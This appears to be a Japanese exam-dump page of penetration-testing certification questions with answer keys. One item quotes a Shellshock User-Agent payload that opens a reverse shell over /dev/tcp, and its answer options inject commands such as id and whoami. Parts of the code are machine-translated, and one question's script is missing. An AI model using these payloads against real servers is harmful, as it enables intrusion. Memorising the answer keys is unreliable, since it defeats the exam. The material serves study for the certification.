侵入テスターは、IT ナレッジ ベースをホストしている内部 Web サーバーの制御権を取得することに成功しました。
侵入テスターが次に試みるべき攻撃は次のどれですか?
A. 水飲み場
B. 捕鯨
C. ヴィッシング
D. スピアフィッシング
正解:A
解説: (Pass4Test メンバーにのみ表示されます)
質問 2:
API の HTTP 応答をインターセプトし、そのコンテンツを変更し、元のモバイル デバイスに転送するために使用するのに最適なツールは次のどれですか?
A. MobSF
B. Android SDK Tools
C. Burp Suite
D. Drozer
正解:C
解説: (Pass4Test メンバーにのみ表示されます)
質問 3:
組織の最高情報セキュリティ責任者が、6 か月前に完了した侵入評価から得られた重要な結果の妥当性について議論しています。次のレポート配信後のアクティビティのうち、このシナリオを回避できた可能性が最も高いのはどれですか?
A. 所見の証明
B. 学んだ教訓
C. データ破棄プロセス
D. クライアントの受け入れ
正解:D
解説: (Pass4Test メンバーにのみ表示されます)
質問 4:
侵入テスターは、10.10.1.1 で脆弱な Web サーバーを発見します。次にテスターは、Web エクスプロイトを送信する Python スクリプトを編集し、次のコードに遭遇します。
エクスプロイト = {"User-Agent": "() { 無視;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":
"テキスト/html,アプリケーション/xhtml+xml,アプリケーション/xml"}
サーバーが実行されているユーザー コンテキストを判断するために、テスト担当者がスクリプトに加える必要がある編集は、次のうちどれですか?
A. エクスプロイト = {"User-Agent": "() { 無視;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":
"テキスト/html,アプリケーション/xhtml+xml,アプリケーション/xml"}
B. エクスプロイト = {"User-Agent": "() { 無視;};/bin/sh -i ps -ef" 0>&1", "Accept":
"テキスト/html,アプリケーション/xhtml+xml,アプリケーション/xml"}
C. エクスプロイト = {"User-Agent": "() { 無視;};/bin/bash -i>& find / -perm -4000", "Accept":
"テキスト/html,アプリケーション/xhtml+xml,アプリケーション/xml"}
D. エクスプロイト = {"User-Agent": "() { 無視;};/bin/bash -i id;whoami", "Accept":
"テキスト/html,アプリケーション/xhtml+xml,アプリケーション/xml"}
正解:D
質問 5:
侵入テスターは、評価の途中で評価チームに加わります。クライアントはチームに対して、口頭と範囲設定文書の両方で、実稼働ネットワークをテストしないように依頼しました。ただし、新しいテスターはこの要求を認識せず、本番環境でエクスプロイトを実行します。この誤解を最も効果的に防いだのは次のうちどれですか?
A. 評価中にテスターがチームに参加することを禁止する
B. すべてのテスト担当者にスコーピング ドキュメントを注意深く確認するよう要求する
C. 実稼働ネットワークを評価しない
D. 本番環境での悪用の禁止
正解:B
解説: (Pass4Test メンバーにのみ表示されます)
質問 6:
次のスクリプトがあるとします。

次のうち、5行目と6行目で実行される機能を特徴づけるのはどれですか?
A. 変数 b をループして、DNS クエリに対して返された結果をカウントし、そのカウントを画面に出力します。
B. 変数 b に既に格納されている各 DNS クエリの結果を出力します。
C. DNS サーバー 10.10.10.10 上のゾーンの開始権限情報を取得します。
D. www.comptia.org に対して単一の DNS クエリを実行し、生データ出力を出力します。
正解:B
解説: (Pass4Test メンバーにのみ表示されます)
1105 お客様のコメント





安谷** -
本当に使えて、本番試験にも無事合格した。地味にすげぇ。苦手な過去問を解けるようになっていることが嬉しいです。